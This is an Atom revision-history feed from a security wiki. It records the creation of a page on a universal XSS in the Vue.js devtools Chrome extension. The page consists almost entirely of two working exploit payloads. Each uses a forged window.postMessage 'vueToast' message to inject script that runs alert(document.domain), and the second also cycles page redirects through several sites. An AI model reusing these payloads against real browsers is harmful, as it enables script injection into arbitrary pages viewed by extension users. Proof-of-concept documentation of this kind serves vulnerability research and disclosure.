<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Chrome_%E6%8F%92%E4%BB%B6_Vue.js_devtools_UXSS</id>
	<title>Chrome 插件 Vue.js devtools UXSS - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Chrome_%E6%8F%92%E4%BB%B6_Vue.js_devtools_UXSS"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Chrome_%E6%8F%92%E4%BB%B6_Vue.js_devtools_UXSS&amp;action=history"/>
	<updated>2026-04-21T04:58:55Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Chrome_%E6%8F%92%E4%BB%B6_Vue.js_devtools_UXSS&amp;diff=1620&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==XSS1== &lt;pre&gt; &lt;script&gt;     setInterval(() =&gt; {         window.postMessage({             vueDetected: true,             vueToast: {                 message: '`,`normal`); func...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Chrome_%E6%8F%92%E4%BB%B6_Vue.js_devtools_UXSS&amp;diff=1620&amp;oldid=prev"/>
		<updated>2021-04-13T09:15:45Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==XSS1== &amp;lt;pre&amp;gt; &amp;lt;script&amp;gt;     setInterval(() =&amp;gt; {         window.postMessage({             vueDetected: true,             vueToast: {                 message: &amp;#039;`,`normal`); func...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==XSS1==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
    setInterval(() =&amp;gt; {&lt;br /&gt;
        window.postMessage({&lt;br /&gt;
            vueDetected: true,&lt;br /&gt;
            vueToast: {&lt;br /&gt;
                message: '`,`normal`); function __VUE_DEVTOOLS_TOAST__(){}; alert(document.domain);//'&lt;br /&gt;
            }&lt;br /&gt;
        }, '*')&lt;br /&gt;
    }, 1000)&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==XSS2==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
    const urls = ['https://www.google.com/', 'https://github.com', 'https://vuejs.org/']&lt;br /&gt;
    var i = 0;&lt;br /&gt;
    setInterval(() =&amp;gt; {&lt;br /&gt;
        window.postMessage({&lt;br /&gt;
            vueDetected: true,&lt;br /&gt;
            vueToast: {&lt;br /&gt;
                message: '`,`normal`); function __VUE_DEVTOOLS_TOAST__(){}; alert(document.domain); location=`' + urls[i++%3] +'`//'&lt;br /&gt;
            }&lt;br /&gt;
        }, '*')&lt;br /&gt;
    }, 3000)&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>